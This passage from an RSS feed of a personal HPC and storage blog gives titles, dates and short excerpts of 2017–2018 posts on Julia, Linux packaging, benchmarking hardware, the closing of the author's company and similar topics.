      <description>So &amp;hellip; Suppose someone comes up to you and makes a claim. This claim isn&amp;rsquo;t backed by facts, merely by unicorns, rainbows, and their own biases. Yeah, this kind of relates to the previous post. They argue based upon the claim. Stake out their ground. Insist that &amp;ldquo;none shall pass&amp;rdquo; in a Black Knight, Monty Python-esque manner. But they are wrong. Simply, factually wrong. Regardless of their biases, you and many others have been demonstrating the very thing that is claimed to be impossible, to customers for years.</description>
    </item>
    
    <item>
      <title>On technology zealotry</title>
      <link>https://blog.scalability.org/2018/05/on-technology-zealotry/</link>
      <pubDate>Tue, 29 May 2018 15:38:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/05/on-technology-zealotry/</guid>
      <description>I&amp;rsquo;ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as &amp;ldquo;attacks&amp;rdquo;. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.</description>
    </item>
    
    <item>
      <title>Interesting post on mixed integer programming for diets ... that has some hilarious output</title>
      <link>https://blog.scalability.org/2018/05/interesting-post-on-mixed-integer-programming-for-diets-that-has-some-hilarious-output/</link>
      <pubDate>Mon, 28 May 2018 20:28:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/05/interesting-post-on-mixed-integer-programming-for-diets-that-has-some-hilarious-output/</guid>
      <description>I am a fan of the Julia language. Tremendously powerful analytical environment, compiled, high performance, easy to understand and use, strongly typed, &amp;hellip; there&amp;rsquo;s a long list of reasons why I like it. If you are doing analytics, modeling, computation in other languages, it is definitely worth a look. Think of it as python, compiled, with multiple dispatch and strong typing &amp;hellip; and no indent-as-structure problem. My Julia fanboi-ism aside, there was an interesting blog post about using JuMP, a linear programming environment for Julia.</description>
    </item>
    
    <item>
      <title>Distribution package dependency radii, or why distros may be doomed</title>
      <link>https://blog.scalability.org/2018/04/distribution-package-dependency-radii-or-why-distros-may-be-doomed/</link>
      <pubDate>Tue, 24 Apr 2018 16:10:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/04/distribution-package-dependency-radii-or-why-distros-may-be-doomed/</guid>
      <description>I am a sucker for a good editor. I like atom. Don&amp;rsquo;t yell at me. It&amp;rsquo;s pretty good for my use cases. It has lots of nice extensions I can and have used. Atom is not without its dependencies though. Installing it, which should be relatively simple, turns out to be &amp;hellip; well &amp;hellip; interesting.
[root@centos7build nyble]# rpm -ivh ~/atom.x86_64.rpm
error: Failed dependencies:
 libXss.so.1()(64bit) is needed by atom-1.26.0-0.1.x86_64
In searching the interwebs for what Xss is, I happened across this little tidbit</description>
    </item>
    
    <item>
      <title>NyBLE</title>
      <link>https://blog.scalability.org/2018/04/nyble/</link>
      <pubDate>Sun, 22 Apr 2018 20:54:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/04/nyble/</guid>
      <description>So there I am updating my new repository to enable using zfs in the ramboot images. This is a simplification and continuation of the previous work I did a few years ago, with some massive code cleanups. And sadly, no documentation yet. Will fix soon, but for now, I am trying to hit the major functionality points. NyBLE is a linux environment for hypervisor hosts. It builds on the old open source SIOS work, and extends it in significant ways.</description>
    </item>
    
    <item>
      <title>Dealing with disappointment</title>
      <link>https://blog.scalability.org/2018/04/dealing-with-disappointment/</link>
      <pubDate>Thu, 19 Apr 2018 19:13:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/04/dealing-with-disappointment/</guid>
      <description>In the last few years, I&amp;rsquo;ve had major disappointments professionally. The collapse of Scalable, some of the positively ridiculous things associated with the aftermath of that, none of which I&amp;rsquo;ve written about until they are over. Almost over, but not quite. Waiting for confirmation. My job search last year, and some of the disappointment associated with that. Recently I&amp;rsquo;ve had a different type of disappointment, without getting into details. The way I&amp;rsquo;ve dealt with these things in the past has been to try to understand, if there was a conflict, what I could have done better.</description>
    </item>
    
    <item>
      <title>Late Feb 2018 update</title>
      <link>https://blog.scalability.org/2018/02/late-feb-2018-update/</link>
      <pubDate>Thu, 22 Feb 2018 19:03:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/02/late-feb-2018-update/</guid>
      <description>Again, many apologies over the low posting frequency. Several things that are nearing completion (hopefully soon) that I want finalized first. That said, the major news is that this site is now on a much improved server and network. I&amp;rsquo;ve switched from Comcast Business to WOW business. So far, much better speed, more consistent performance, far lower cost per bandwidth. I do have lots to write about, and have been saving things up until after this particular objective is met, so I can work/write distraction free.</description>
    </item>
    
    <item>
      <title>Apologies on the slow posting rate</title>
      <link>https://blog.scalability.org/2017/12/apologies-on-the-slow-posting-rate/</link>
      <pubDate>Wed, 13 Dec 2017 14:18:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/12/apologies-on-the-slow-posting-rate/</guid>
      <description>Many things are going on simultaneously right now, and I have little time to compose thoughts for the blog. I anticipate a bit of a letup in the next week or two as the year comes to a close.</description>
    </item>
    
    <item>
      <title>Cool bug on upgrade (not)</title>
      <link>https://blog.scalability.org/2017/11/cool-bug-on-upgrade-not/</link>
      <pubDate>Tue, 21 Nov 2017 05:22:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/11/cool-bug-on-upgrade-not/</guid>
      <description>Wordpress is an interesting beast. Spent hours working through issues that I shouldn&amp;rsquo;t have needed to on an upgrade, as some functions were deprecated. In an interesting way. By removing them, and throwing an error. Which I found only through looking at a specific log. So out goes that plugin. And the site is back.</description>
    </item>
    
    <item>
      <title>Put my Riemann Zeta Function sum reduction code on github</title>
      <link>https://blog.scalability.org/2017/11/put-my-riemann-zeta-function-sum-reduction-code-on-github/</link>
      <pubDate>Sat, 11 Nov 2017 17:44:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/11/put-my-riemann-zeta-function-sum-reduction-code-on-github/</guid>
      <description>Repo is here: https://github.com/joelandman/rzf. There&amp;rsquo;s a lightning talk to go along with it, and I&amp;rsquo;ll make sure I can get it together for this as well.</description>
    </item>
    
    <item>
      <title>#SC17</title>
      <link>https://blog.scalability.org/2017/11/sc17/</link>
      <pubDate>Thu, 09 Nov 2017 13:16:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/11/sc17/</guid>
      <description>I&amp;rsquo;ve had numerous requests from friends and colleagues about whether I will be attending #SC17 this year. Sadly, this is not to be the case. $dayjob has me attending an onsite meeting that week in San Francisco, and the schedule was such that I could not attend the talks I was interested in. I&amp;rsquo;d love for there to be a way to listen to the talks remotely. Maybe I&amp;rsquo;ll simply buy the DVD/USB stick of the talks if there is an online store for them.</description>
    </item>
    
    <item>
      <title>Disk, SSD, NVMe preparation tools cleaned up and on GitHub</title>
      <link>https://blog.scalability.org/2017/09/disk-ssd-nvme-preparation-tools-cleaned-up-and-on-github/</link>
      <pubDate>Thu, 14 Sep 2017 13:26:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/disk-ssd-nvme-preparation-tools-cleaned-up-and-on-github/</guid>
      <description>These are a collection of (MIT licensed) tools I&amp;rsquo;ve been working on for years to automate some of the major functionality one needs when setting up/using new machines with lots of disks/SSD/NVMe. The repo is here: https://github.com/joelandman/disk_test_setup . I will be adding some sas secure erase and formatting tools into this. These tools wrap other lower level tools, and handle the process of automating common tasks you worry about when you are setting up and testing a machine with many drives.</description>
    </item>
    
    <item>
      <title>Aria2c for the win!</title>
      <link>https://blog.scalability.org/2017/09/aria2c-for-the-win/</link>
      <pubDate>Wed, 06 Sep 2017 02:46:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/aria2c-for-the-win/</guid>
      <description>I&amp;rsquo;ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.</description>
    </item>
    
    <item>
      <title>Working on benchmarking ML frameworks</title>
      <link>https://blog.scalability.org/2017/09/working-on-benchmarking-ml-frameworks/</link>
      <pubDate>Tue, 05 Sep 2017 20:06:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/working-on-benchmarking-ml-frameworks/</guid>
      <description>Nice machine we have here &amp;hellip;
root@hermes:/data/tests# lspci | egrep -i &#39;(AMD|NVidia)&#39; | grep VGA
3b:00.0 VGA compatible controller: &amp;lt;a href=&amp;quot;http://www.pny.com/nvidia-quadro-gp100&amp;quot;&amp;gt;NVIDIA Corporation GP100GL&amp;lt;/a&amp;gt; (rev a1)
88:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] &amp;lt;a href=&amp;quot;http://www.tomshardware.com/reviews/amd-radeon-vega-frontier-edition-16gb,5128.html&amp;quot;&amp;gt;Vega 10 XTX&amp;lt;/a&amp;gt; [Radeon Vega Frontier Edition]
I want to see how tensorflow and many others run on each of the cards. The processor is no slouch either:
root@hermes:/data/tests# lscpu | grep &amp;quot;Model name&amp;quot;
Model name: Intel(R) Xeon(R) Gold 6134 CPU @ 3.</description>
    </item>
    
    <item>
      <title>Oracle finally kills off Solaris and SPARC</title>
      <link>https://blog.scalability.org/2017/09/oracle-finally-kills-off-solaris-and-sparc/</link>
      <pubDate>Mon, 04 Sep 2017 17:24:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/oracle-finally-kills-off-solaris-and-sparc/</guid>
      <description>This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.</description>
    </item>
    
    <item>
      <title>M&amp;A and business things</title>
      <link>https://blog.scalability.org/2017/09/ma-and-business-things/</link>
      <pubDate>Mon, 04 Sep 2017 16:45:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/ma-and-business-things/</guid>
      <description>First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC&amp;rsquo;s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is the direction in which all of the storage parts OEMs needed to move, though Seagate failed to execute correctly, selling off their array business in part to Cray. Toshiba &amp;hellip; well &amp;hellip; they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree &amp;hellip; This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.</description>
    </item>
    
    <item>
      <title>A completed project: mysqldump file to CSV converter</title>
      <link>https://blog.scalability.org/2017/08/a-completed-project-mysqldump-file-to-csv-converter/</link>
      <pubDate>Thu, 31 Aug 2017 02:23:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/08/a-completed-project-mysqldump-file-to-csv-converter/</guid>
      <description>This was part of something else I&amp;rsquo;d worked on, but it never saw the light of day for a number of (rather silly) reasons. So rather than let these bits go to waste, I created a github repo for posterity. Someone might be able to make effective use of them somewhere. Repo is located here: https://github.com/joelandman/msd2csv Pretty simple code, does most of the work in-memory, and multiple regex passes to transform and clean up the CSV.</description>
    </item>
    
    <item>
      <title>Finally got to use MCE::* in a project</title>
      <link>https://blog.scalability.org/2017/08/finally-got-to-use-mce-in-a-project/</link>
      <pubDate>Thu, 17 Aug 2017 13:45:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/08/finally-got-to-use-mce-in-a-project/</guid>
      <description>There are a set of modules in the Perl universe that I&amp;rsquo;ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many-core CPUs via a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn&amp;rsquo;t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.</description>
    </item>
    
    <item>
      <title>Cray &#34;acquires&#34; ClusterStor business unit from Seagate</title>
      <link>https://blog.scalability.org/2017/07/cray-acquires-clusterstor-business-unit-from-seagate/</link>
      <pubDate>Fri, 28 Jul 2017 19:57:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/07/cray-acquires-clusterstor-business-unit-from-seagate/</guid>
      <description>Information at this link. It is being called a &amp;ldquo;strategic transaction&amp;rdquo;, though it likely came about via Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of an earlier transaction, the purchase of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).</description>
    </item>
    
    <item>
      <title>More unix command line humor</title>
      <link>https://blog.scalability.org/2017/06/more-unix-command-line-humor/</link>
      <pubDate>Mon, 26 Jun 2017 15:07:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/more-unix-command-line-humor/</guid>
      <description></description>
    </item>
    
    <item>
      <title>What reduces risk ... a great engineering and support team, or a brand name ?</title>
      <link>https://blog.scalability.org/2017/06/what-reduces-risk-a-great-engineering-and-support-team-or-a-brand-name/</link>
      <pubDate>Mon, 26 Jun 2017 14:39:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/what-reduces-risk-a-great-engineering-and-support-team-or-a-brand-name/</guid>
      <description>I&amp;rsquo;ve written about approved vendors and the &amp;ldquo;one throat to choke&amp;rdquo; concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems &amp;hellip; was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.</description>
    </item>
    
    <item>
      <title>On hackerrank and Julia</title>
      <link>https://blog.scalability.org/2017/06/on-hackerrank-and-julia/</link>
      <pubDate>Wed, 14 Jun 2017 13:19:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/on-hackerrank-and-julia/</guid>
      <description>My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I&amp;rsquo;ll play with problems from my research days, or small throw-away ones, like on Hackerrank.</description>
    </item>
    
    <item>
      <title>The birthday problem (allocation collisions) for networks and MAC addresses</title>
      <link>https://blog.scalability.org/2017/06/the-birthday-problem-allocation-collisions-for-networks-and-mac-addresses/</link>
      <pubDate>Wed, 07 Jun 2017 15:09:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/the-birthday-problem-allocation-collisions-for-networks-and-mac-addresses/</guid>
      <description>The birthday problem is a fairly simple situation to state. There is at least a 50% probability (i.e. an even chance) that at least 2 of 23 randomly chosen people in a room have the same birthday. This comes from some elementary applications of statistics, and is documented on Wikipedia. While we care less about networks celebrating their annual journey around Sol, we care more about potential address collisions for statically assigned IP addresses.</description>
    </item>
    
    <item>
      <title>Now for your bidding pleasure, the contents of one company</title>
      <link>https://blog.scalability.org/2017/06/now-for-your-bidding-pleasure-the-contents-of-one-company/</link>
      <pubDate>Fri, 02 Jun 2017 15:22:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/now-for-your-bidding-pleasure-the-contents-of-one-company/</guid>
      <description>This is an on-going process I won&amp;rsquo;t comment on, other than to provide a link to the bidding site. There are numerous cool items in there.
 Lot 2-57207: a 64 bay siFlash/Cadence machine with 64x 400GB SAS SSDs. Fully operational, SSDs very lightly used, extraordinarily fast unit.
 Lot 2-57215: 2 mac minis (one was my desktop unit)
 Lot 2-57216: My old Macbook pro, 750 GB SSD, 16 GB ram, NVidia gfx
 Lot 2-57081: Mac pro tower unit
 Lot 2-57232: a bunch of awesome monitors
 Lot 2-57222: Mini 24U rack with PDUs
 Lot 2-57015: Supermicro Twin 2U system (5 others just like it)
 Lot 2-57100: a 40 core 256GB testbed machine
 And many other computer systems, parts, etc.</description>
    </item>
    
    <item>
      <title>One door has closed, another has opened</title>
      <link>https://blog.scalability.org/2017/04/one-door-has-closed-another-has-opened/</link>
      <pubDate>Fri, 14 Apr 2017 14:54:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/one-door-has-closed-another-has-opened/</guid>
      <description>As I had written previously, my old company, Scalable Informatics, has closed. Read that posting to see why and how, but as with all things &amp;hellip; we must move forward. It is cliché to use the title phrase. But it is also true. We know the door that closed. It&amp;rsquo;s the door that has opened afterwards that I am focusing upon. I have joined Joyent to work on, as it turns out, many similar things to what I did at Scalable.</description>
    </item>
    
    <item>
      <title>Hard disk shipments dropped 10% QoQ, 2% YoY</title>
      <link>https://blog.scalability.org/2017/04/hard-disk-shipments-dropped-10-qoq-2-yoy/</link>
      <pubDate>Tue, 11 Apr 2017 13:22:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/hard-disk-shipments-dropped-10-qoq-2-yoy/</guid>
      <description>This jibes very well with what I&amp;rsquo;ve observed. Decreasing demand for enterprise storage hard disks, or as I call them &amp;ldquo;Spinning Rust Drives&amp;rdquo; (or SRD) as compared with SSD (Solid State Drives). The summary is here with a key quote being
Again, this jibes well with what I&amp;rsquo;ve observed. Mellanox has a good take on its blog, noting that
This is a critical point. While SRD are dropping in volume, there is not enough SSD fab capacity to supply the market demand.</description>
    </item>
    
    <item>
      <title>Selling #HPC things on ebay</title>
      <link>https://blog.scalability.org/2017/04/selling-hpc-things-on-ebay/</link>
      <pubDate>Wed, 05 Apr 2017 13:52:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/selling-hpc-things-on-ebay/</guid>
      <description>Given that the (now former) day job has ended, I am selling some of the old day job&amp;rsquo;s assets on ebay. We&amp;rsquo;ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.</description>
    </item>
    
    <item>
      <title>I always love these breathless stories of great speed, and how VCs love them ...</title>
      <link>https://blog.scalability.org/2017/04/i-always-love-these-breathless-stories-of-great-speed-and-how-vcs-love-them/</link>
      <pubDate>Tue, 04 Apr 2017 13:46:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/i-always-love-these-breathless-stories-of-great-speed-and-how-vcs-love-them/</guid>
      <description>Though, when I look at the &amp;ldquo;great speed&amp;rdquo;, it is often on par with or less than what Scalable Informatics sustained years before. From the 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks &amp;hellip;
Article in question is in the Register. Some of the speeds and feeds:
 * 200 microsecs latency
 * 45GBps read bandwidth
 * 15GBps write bandwidth
 * 7 million IOPS
 But then &amp;hellip; a fibre connection.</description>
    </item>
    
    <item>
      <title>pcilist: because sometimes you really, really need to know how your PCIe devices are configured</title>
      <link>https://blog.scalability.org/2017/03/pcilist-because-sometimes-you-really-really-need-to-know-how-your-pcie-devices-are-configured/</link>
      <pubDate>Wed, 29 Mar 2017 02:41:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/pcilist-because-sometimes-you-really-really-need-to-know-how-your-pcie-devices-are-configured/</guid>
      <description>If you don&amp;rsquo;t know what I am talking about here, that&amp;rsquo;s fine. I&amp;rsquo;ll assume you don&amp;rsquo;t do hardware, or you call someone else when there is a hardware problem. If you think &amp;ldquo;well gee, don&amp;rsquo;t we have lspci? so why do we need this?&amp;rdquo; then you probably have not really tried to use lspci to find this information, or didn&amp;rsquo;t know it was available. Ok &amp;hellip; what I am talking about.</description>
    </item>
    
    <item>
      <title>Requiem</title>
      <link>https://blog.scalability.org/2017/03/requiem/</link>
      <pubDate>Wed, 22 Mar 2017 14:12:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/requiem/</guid>
      <description>This is the post an entrepreneur hopes to never write. They pour their energy, their time, their resources, their love into their baby. Trying to make her live, trying to make her grow. And for a while, she seems to. Everything is hitting the right way, 12+ years of uninterrupted growth and profitable operation as an entirely bootstrapped company. Market leading &amp;hellip; no &amp;hellip; dominating &amp;hellip; from the metrics customers tell you are important &amp;hellip; position.</description>
    </item>
    
    <item>
      <title>Some updates coming soon</title>
      <link>https://blog.scalability.org/2017/03/some-updates-coming-soon/</link>
      <pubDate>Sat, 18 Mar 2017 12:56:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/some-updates-coming-soon/</guid>
      <description>I should have something interesting to talk about over the next two weeks, though a summary of this is that Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
 M&amp;amp;A: Nimble was purchased by HPE. Not sure of the specifics of &amp;ldquo;why&amp;rdquo;, other than HPE didn&amp;rsquo;t have much in this space.</description>
    </item>
    
    <item>
      <title>Best comment I&#39;ve seen in a bug report about a tool</title>
      <link>https://blog.scalability.org/2017/03/best-comment-ive-seen-in-a-bug-report-about-a-tool/</link>
      <pubDate>Thu, 16 Mar 2017 18:54:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/best-comment-ive-seen-in-a-bug-report-about-a-tool/</guid>
      <description>So &amp;hellip; gnome-terminal has been my standard cli interface on linux GUIs for a while. I can&amp;rsquo;t bring myself to use KDE for any number of reasons. Gnome itself went in strange directions, so I&amp;rsquo;ve been using Cinnamon atop Mint and Debian 8. Ok, Debian 8. Gnome-terminal. Some things missing when you right mouse button click. Like &amp;ldquo;open new tab&amp;rdquo;. Open new window is there. This works. But no tab entry.</description>
    </item>
    
    <item>
      <title>structure by indentation ... grrrr ....</title>
      <link>https://blog.scalability.org/2017/03/structure-by-indentation-grrrr/</link>
      <pubDate>Sun, 05 Mar 2017 20:56:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/structure-by-indentation-grrrr/</guid>
      <description>If you have to do this:
:%s/\t/ /g
in order to get a very simple function to compile because of this error
File &amp;quot;./snd.py&amp;quot;, line 13
    return sum
    ^
IndentationError: unindent does not match any outer indentation level
even though your editor (atom!!!!??!?!) wasn&amp;rsquo;t showing you these mixed tabs and spaces &amp;hellip; Yeah, there is something profoundly wrong with the approach. The function in question was all of 10 lines.</description>
    </item>
    
    <item>
      <title>What is old, is new again</title>
      <link>https://blog.scalability.org/2017/03/what-is-old-is-new-again/</link>
      <pubDate>Thu, 02 Mar 2017 15:26:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/what-is-old-is-new-again/</guid>
      <description>Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with &amp;ldquo;modern&amp;rdquo; programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.</description>
    </item>
    
    <item>
      <title>That was fun: mysql update nuked remote access</title>
      <link>https://blog.scalability.org/2017/02/that-was-fun-mysql-update-nuked-remote-access/</link>
      <pubDate>Thu, 23 Feb 2017 17:02:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/that-was-fun-mysql-update-nuked-remote-access/</guid>
      <description>Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.</description>
    </item>
    
    <item>
      <title>An article on Rust language for astrophysical simulation</title>
      <link>https://blog.scalability.org/2017/02/an-article-on-rust-language-for-astrophysical-simulation/</link>
      <pubDate>Mon, 13 Feb 2017 14:26:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/an-article-on-rust-language-for-astrophysical-simulation/</guid>
      <description>It is a short read, and you can find it on arxiv. They tackled an integration problem, basically using the code to perform a relatively simple trajectory calculation for a particular N-body problem. A few things leapt out at me during my read. First, the example was fairly simplistic &amp;hellip; a leapfrog integrator, and while it is a symplectic integrator, this particular algorithm is not quite of high enough order to capture all the features of the N-body interaction they were working on.</description>
    </item>
    
    <item>
      <title>Brings a smile to my face ... #BioIT #HPC accelerator</title>
      <link>https://blog.scalability.org/2017/02/brings-a-smile-to-my-face-bioit-hpc-accelerator/</link>
      <pubDate>Thu, 09 Feb 2017 22:21:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/brings-a-smile-to-my-face-bioit-hpc-accelerator/</guid>
      <description>Way way back in the early aughts (2000&amp;rsquo;s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn&amp;rsquo;t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.</description>
    </item>
    
    <item>
      <title>Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general</title>
      <link>https://blog.scalability.org/2017/02/another-article-about-the-supply-crisis-hitting-ssd-flash-nvme-hpc-storage-in-general/</link>
      <pubDate>Tue, 07 Feb 2017 14:00:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/another-article-about-the-supply-crisis-hitting-ssd-flash-nvme-hpc-storage-in-general/</guid>
      <description>I&amp;rsquo;ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I&amp;rsquo;ve not been very successful at doing so &amp;hellip; and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I&amp;rsquo;ve tried to explain to others in phone conversations and private email threads.</description>
    </item>
    
    <item>
      <title>A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage</title>
      <link>https://blog.scalability.org/2017/01/a-nice-shout-out-in-computerweekly-com-about-scalableinfo-hpc-storage/</link>
      <pubDate>Wed, 25 Jan 2017 17:35:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/a-nice-shout-out-in-computerweekly-com-about-scalableinfo-hpc-storage/</guid>
      <description>See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say &amp;ldquo;X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.&amp;rdquo; Hey, we were the first to come up with &amp;ldquo;face melting performance&amp;rdquo;. More than a year ago. And it really wasn&amp;rsquo;t us, but my buddy Dr. James Cuff of Harvard.</description>
    </item>
    
    <item>
      <title>when you eliminate the impossible, what is left, no matter how improbable, is likely the answer</title>
      <link>https://blog.scalability.org/2017/01/when-you-eliminate-the-impossible-what-is-left-no-matter-how-improbable-is-likely-the-answer/</link>
      <pubDate>Wed, 25 Jan 2017 17:20:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/when-you-eliminate-the-impossible-what-is-left-no-matter-how-improbable-is-likely-the-answer/</guid>
      <description>This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.</description>
    </item>
    
    <item>
      <title>Virtualized infrastructure, with VM storage on software RAID &#43; a rebuild == occasional VM pauses</title>
      <link>https://blog.scalability.org/2017/01/virtualized-infrastructure-with-vm-storage-on-software-raid-a-rebuild-occasional-vm-pauses/</link>
      <pubDate>Sun, 22 Jan 2017 21:09:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/virtualized-infrastructure-with-vm-storage-on-software-raid-a-rebuild-occasional-vm-pauses/</guid>
      <description>Not what I was hoping for. I may explain more of what I am doing later (less interesting than why I am doing it), but suffice it to say that I&amp;rsquo;ve got a machine I&amp;rsquo;ve turned into a VM/container box, so I can build something I need to build. This box has a large RAID6 for storage. Spinning disk. Fairly well optimized, I get good performance out of it. The box has ample CPU, and ample memory.</description>
    </item>
    
    <item>
      <title>A new #HPC project on github, nlytiq-base</title>
      <link>https://blog.scalability.org/2017/01/a-new-hpc-project-on-github-nlytiq-base/</link>
      <pubDate>Sat, 21 Jan 2017 02:53:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/a-new-hpc-project-on-github-nlytiq-base/</guid>
      <description>Another itch I&amp;rsquo;ve been wanting to scratch for a very long time. I had internal versions of a small version of this for a while, but I wasn&amp;rsquo;t happy with them. The makefiles were brittle. The builds, while automated, would fail, quite often, for obscure reasons. And I want a platform to build upon, to enable others to build upon. Not OpenHPC which is more about the infrastructure one needs for building/running high performance computing systems.</description>
    </item>
    
    <item>
      <title>There are real, and subtle differences between su and sudo</title>
      <link>https://blog.scalability.org/2017/01/there-are-real-and-subtle-differences-between-su-and-sudo/</link>
      <pubDate>Thu, 19 Jan 2017 15:03:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/there-are-real-and-subtle-differences-between-su-and-sudo/</guid>
      <description>Most of the time, sudo just works. Every now and then, it doesn&amp;rsquo;t. Most recently was with a build I am working on, where I got a &amp;ldquo;permission denied&amp;rdquo; error for creating a directory. The reason for this was non-obvious at first. You &amp;ldquo;are&amp;rdquo; superuser after all when you sudo, right? Aren&amp;rsquo;t you? Sort of. Your effective user ID has been set to the superuser. Your real user ID still is yours.</description>
    </item>
    
    <item>
      <title>Combine these things, and get a very difficult to understand customer service</title>
      <link>https://blog.scalability.org/2017/01/combine-these-things-and-get-a-very-difficult-to-understand-customer-service/</link>
      <pubDate>Wed, 18 Jan 2017 20:24:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/combine-these-things-and-get-a-very-difficult-to-understand-customer-service/</guid>
      <description>In the process of disconnecting a service we don&amp;rsquo;t need anymore. So I call their number. Obviously reroutes to a remote call center. One where English is not the primary language. I&amp;rsquo;m ok with this, but the person has a very thick and hard to understand accent. Their usage and idiom were not American or British English. This also complicates matters somewhat, but I am used to it. I can infer where they were from, from their usage.</description>
    </item>
    
    <item>
